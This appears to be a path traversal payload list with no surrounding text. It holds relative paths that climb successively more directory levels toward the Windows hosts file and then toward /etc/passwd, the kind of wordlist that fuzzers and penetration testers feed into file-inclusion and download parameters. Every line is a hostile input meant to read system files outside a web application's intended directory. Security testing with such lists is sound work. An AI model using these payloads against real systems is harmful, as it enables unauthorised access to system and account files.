windows\system32\drivers\etc\hosts
..\windows\system32\drivers\etc\hosts
..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
